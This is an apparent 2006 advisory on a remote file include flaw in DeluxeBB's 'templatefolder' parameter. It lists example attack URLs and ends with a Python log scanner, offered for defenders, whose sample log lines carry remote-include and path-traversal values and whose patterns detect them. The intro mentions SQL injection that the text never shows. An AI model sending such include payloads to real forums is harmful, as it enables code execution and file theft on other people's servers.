
DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities

Author: Andreas Sandblad
Risk: [Security Risk Unsorted]
0day-ID: 0day-ID-519
Category: web applications
Date added: 14-06-2006
Platform: unsorted

Secunia Research has discovered some vulnerabilities in DeluxeBB,
which can be exploited by malicious people to conduct SQL injection
attacks and compromise a vulnerable system.

1) Input passed to the "templatefolder" parameter in various scripts
is not properly verified before it is used to include files. This can
be exploited to include arbitrary files from external and local
resources.

Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]
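
For defenders reviewing web server logs, the sketch below flags requests to the script paths listed above that carry a "templatefolder" parameter. It is an added example, not part of the original advisory or of DeluxeBB. It assumes a common/combined-format access log; the sample lines, addresses and the names `classify` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The three script names from the advisory, under any template set directory.
SCRIPT_RE = re.compile(r"^/(?:.*/)?templates/[^/]+/(?:postreply|posting|pm/newpm)\.php$")
# Request field of a common/combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [14/Jun/2006:10:00:00 +0000] "GET /forum/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Jun/2006:10:00:05 +0000] "GET /forum/templates/deluxe/posting.php'
    '?templatefolder=http%3A%2F%2Fexample.org%2Fx HTTP/1.1" 200 312',
    '198.51.100.7 - - [14/Jun/2006:10:00:09 +0000] "GET /forum/templates/default/pm/newpm.php'
    '?templatefolder=..%2F..%2Fsample HTTP/1.1" 200 98',
    '192.0.2.10 - - [14/Jun/2006:10:01:00 +0000] "GET /forum/templates/deluxe/postreply.php HTTP/1.1" 200 0',
]

def classify(value):
    """Say where a templatefolder value would point an include."""
    v = value.lower()
    if re.match(r"[a-z][a-z0-9+.-]*://", v) or v.startswith("//"):
        return "remote"   # URL scheme or protocol-relative: external resource
    if ".." in v or "\x00" in v or v.startswith(("/", "\\")) or re.match(r"[a-z]:[\\/]", v):
        return "local"    # traversal, null byte, or absolute path: local resource
    return "present"      # parameter supplied at all; still worth a look

def scan(lines):
    """Return (line_number, label, decoded_value) for each matching request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not SCRIPT_RE.match(target.path):
            continue
        # parse_qs percent-decodes once, so %2e%2e%2f is seen as ../
        for value in parse_qs(target.query, keep_blank_values=True).get("templatefolder", []):
            hits.append((number, classify(value), value))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The scan sees only what the request line records; parameters sent in a request body do not appear in an access log.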


